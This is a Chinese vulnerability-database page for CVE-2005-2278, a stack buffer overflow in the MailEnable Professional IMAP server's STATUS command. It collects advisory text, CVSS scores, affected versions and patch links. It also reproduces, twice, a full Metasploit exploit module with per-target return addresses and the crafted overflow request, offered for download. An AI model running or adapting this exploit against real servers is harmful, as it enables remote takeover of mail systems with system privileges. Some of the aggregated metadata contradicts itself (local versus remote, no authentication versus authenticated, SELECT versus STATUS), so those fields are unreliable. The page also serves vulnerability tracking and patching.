CVE-2005-2278
CVSS7.2
发布时间 :2005-07-18 00:00:00
修订时间 :2016-10-17 23:25:57
NMCOEPS    

[原文]Stack-based buffer overflow in the IMAP daemon (imapd) in MailEnable Professional 1.54 allows remote authenticated users to execute arbitrary code via the status command with a long mailbox name.


[CNNVD]MailEnable Professional IMAP4 缓冲区溢出漏洞(CNNVD-200507-195)

        MailEnable是一款电子邮件平台软件。
        MailEnable Professional 1.54版本中的IMAP服务存在缓冲区溢出漏洞。
        imapd在处理STATUS命令请求的参数时存在缓冲区溢出漏洞,远程经认证的攻击者可通过使用带有超长mailbox名的status命令,执行任意代码。

- CVSS (基础分值)

CVSS分值: 7.2 [严重(HIGH)]
机密性影响: COMPLETE [完全的信息泄露导致所有系统文件暴露]
完整性影响: COMPLETE [系统完整性可被完全破坏]
可用性影响: COMPLETE [可能导致系统完全宕机]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: LOCAL [漏洞利用需要具有物理访问权限或本地帐户]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2278
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-2278
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200507-195
(官方数据源) CNNVD

- 其它链接及资源

http://marc.info/?l=bugtraq&m=112127188609993&w=2
(UNKNOWN)  BUGTRAQ  20050712 CORE-2005-0629: MailEnable Buffer Overflow Vulnerability
http://www.coresecurity.com/common/showdoc.php?idx=467&idxseccion=10
(VENDOR_ADVISORY)  MISC  http://www.coresecurity.com/common/showdoc.php?idx=467&idxseccion=10

- 漏洞信息

MailEnable Professional IMAP4 缓冲区溢出漏洞
高危 缓冲区溢出
2005-07-18 00:00:00 2007-07-24 00:00:00
远程  
        MailEnable是一款电子邮件平台软件。
        MailEnable Professional 1.54版本中的IMAP服务存在缓冲区溢出漏洞。
        imapd在处理STATUS命令请求的参数时存在缓冲区溢出漏洞,远程经认证的攻击者可通过使用带有超长mailbox名的status命令,执行任意代码。

- 公告与补丁

        目前厂商已经发布了升级补丁以修复此安全问题,补丁获取链接:
        http://www.mailenable.com/hotfix/

- 漏洞信息 (16485)

MailEnable IMAPD (1.54) STATUS Request Buffer Overflow (EDBID:16485)
windows remote
2010-04-30 Verified
0 metasploit
N/A [点击下载]
##
# $Id: mailenable_status.rb 9179 2010-04-30 08:40:19Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = GreatRanking

	include Msf::Exploit::Remote::Imap
	include Msf::Exploit::Remote::Seh

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'MailEnable IMAPD (1.54) STATUS Request Buffer Overflow',
			'Description'    => %q{
					MailEnable's IMAP server contains a buffer overflow
				vulnerability in the STATUS command. With proper
				credentials, this could allow for the execution of arbitrary
				code.
			},
			'Author'         => [ 'MC' ],
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision: 9179 $',
			'References'     =>
				[
					[ 'CVE', '2005-2278'],
					[ 'OSVDB', '17844'],
					[ 'BID', '14243'],
					[ 'NSS', '19193'],
				],
			'Privileged'     => true,
			'DefaultOptions' =>
				{
					'EXITFUNC' => 'thread',
				},
			'Payload'        =>
				{
					'Space'    => 450,
					'BadChars' => "\x00\x0a\x0d\x20",
					'StackAdjustment' => -3500,
				},
			'Platform'       => 'win',
			'Targets'        =>
				[
					['MailEnable 1.54 Pro Universal',  { 'Rets' =>  [9273, 0x1001c019] }], #MEAISP.DLL
					['Windows XP Pro SP0/SP1 English', { 'Rets' =>  [9273, 0x71aa32ad] }],
					['Windows 2000 Pro English ALL',   { 'Rets' =>  [9273, 0x75022ac4] }],
					['Windows 2003 Server English',    { 'Rets' =>  [9273, 0x7ffc0638] }],
				],
			'DisclosureDate' => 'Jul 13 2005',
			'DefaultTarget' => 0))
	end

	def exploit
		connect_login

		seh = generate_seh_payload(target['Rets'][1])
		buf = rand_text_alphanumeric(target['Rets'][0])
		req = "a001 STATUS \".\x00" + buf + seh
		req << "\" (UIDNEXT UIDVALIDITY MESSAGES UNSEEN RECENT)\r\n"
		sock.put(req)

		handler
		disconnect
	end

end
		

- 漏洞信息 (F83205)

MailEnable IMAPD (1.54) STATUS Request Buffer Overflow (PacketStormID:F83205)
2009-11-26 00:00:00
MC  metasploit.com
exploit,overflow,arbitrary,imap
CVE-2005-2278
[点击下载]

MailEnable's IMAP server contains a buffer overflow vulnerability in the STATUS command. With proper credentials, this could allow for the execution of arbitrary code.

##
# $Id$
##

##
# This file is part of the Metasploit Framework and may be subject to 
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##


require 'msf/core'


class Metasploit3 < Msf::Exploit::Remote

	include Msf::Exploit::Remote::Imap
	include Msf::Exploit::Remote::Seh

	def initialize(info = {})
		super(update_info(info,	
			'Name'           => 'MailEnable IMAPD (1.54) STATUS Request Buffer Overflow',
			'Description'    => %q{
				MailEnable's IMAP server contains a buffer overflow
				vulnerability in the STATUS command. With proper
				credentials, this could allow for the execution of arbitrary
				code.
					
			},
			'Author'         => [ 'MC' ],
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision$',
			'References'     =>
				[
					[ 'CVE', '2005-2278'],
					[ 'OSVDB', '17844'],
					[ 'BID', '14243'],
					[ 'NSS', '19193'],

				],
			'Privileged'     => true,
			'DefaultOptions' =>
				{
					'EXITFUNC' => 'thread',
				},			
			'Payload'        =>
				{
					'Space'    => 450,
					'BadChars' => "\x00\x0a\x0d\x20",
					'StackAdjustment' => -3500,
				},
			'Platform'       => 'win',
			'Targets'        => 
				[
					['MailEnable 1.54 Pro Universal',  { 'Rets' =>  [9273, 0x1001c019] }], #MEAISP.DLL
					['Windows XP Pro SP0/SP1 English', { 'Rets' =>  [9273, 0x71aa32ad] }],
					['Windows 2000 Pro English ALL',   { 'Rets' =>  [9273, 0x75022ac4] }],
					['Windows 2003 Server English',    { 'Rets' =>  [9273, 0x7ffc0638] }],
				],
			'DisclosureDate' => 'Jul 13 2005',
			'DefaultTarget' => 0))
	end

	def exploit
		connect_login
		
		seh = generate_seh_payload(target['Rets'][1])
		buf = rand_text_alphanumeric(target['Rets'][0])
		req = "a001 STATUS \".\x00" + buf + seh
		req << "\" (UIDNEXT UIDVALIDITY MESSAGES UNSEEN RECENT)\r\n"
		sock.put(req)
		
		handler
		disconnect
	end

end
    

- 漏洞信息

17844
MailEnable IMAP STATUS Command Remote Overflow
Remote / Network Access Denial of Service, Input Manipulation
Loss of Integrity Patch / RCS, Upgrade
Exploit Public, Exploit Commercial Vendor Verified

- 漏洞描述

A remote overflow exists in MailEnable Professional and Enterprise. The product fails to validate input to the IMAP STATUS command resulting in a stack-based buffer overflow. With a specially crafted request, an authenticated attacker can cause the service to fail, and may be able to execute arbitrary code with System privileges, resulting in a loss of integrity.

- 时间线

2005-07-12 Unknow
2005-07-12 2005-06-30

- 解决方案

Upgrade to MailEnable Professional version 1.6, MailEnable Enterprise version 1.1 or higher, as it has been reported to fix this vulnerability. In addition, MailEnable has released a patch for some older versions.

- 相关参考

- 漏洞作者

- 漏洞信息

MailEnable IMAP SELECT Request Buffer Overflow Vulnerability
Boundary Condition Error 14243
Yes No
2005-07-13 12:00:00 2009-07-12 04:06:00
Discovery is credited to Ariel Sanchez from Core Security Technologies.

- 受影响的程序版本

MailEnable MailEnable Professional 1.54
MailEnable MailEnable Professional 1.53
MailEnable MailEnable Professional 1.52
MailEnable MailEnable Professional 1.51
MailEnable MailEnable Professional 1.5
MailEnable MailEnable Enterprise Edition 1.0 4
MailEnable MailEnable Enterprise Edition 1.0 3
MailEnable MailEnable Enterprise Edition 1.0 2
MailEnable MailEnable Enterprise Edition 1.0 1
MailEnable MailEnable Enterprise Edition 1.0

- 漏洞讨论

MailEnable's IMAP server is prone to a remotely exploitable stack-based buffer overflow vulnerability. This issue is due to a failure of the application to properly bounds check user-supplied data prior to copying it to a fixed size memory buffer.

Remote attackers may exploit this vulnerability to execute arbitrary machine code in the context of the affected application. This allows attackers to gain System level privileges, resulting in the complete compromise of the targeted computer.

- 漏洞利用

Proof of concept code causing a crash in the affected service is available.

An exploit (mailenable_imap.pm) as part of the Metasploit Framework has been released.

- 解决方案

The vendor has provided a hotfix to address this issue:


MailEnable MailEnable Enterprise Edition 1.0 2

MailEnable MailEnable Enterprise Edition 1.0

MailEnable MailEnable Enterprise Edition 1.0 1

MailEnable MailEnable Enterprise Edition 1.0 3

MailEnable MailEnable Enterprise Edition 1.0 4

MailEnable MailEnable Professional 1.5

MailEnable MailEnable Professional 1.51

MailEnable MailEnable Professional 1.52

MailEnable MailEnable Professional 1.53

MailEnable MailEnable Professional 1.54

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站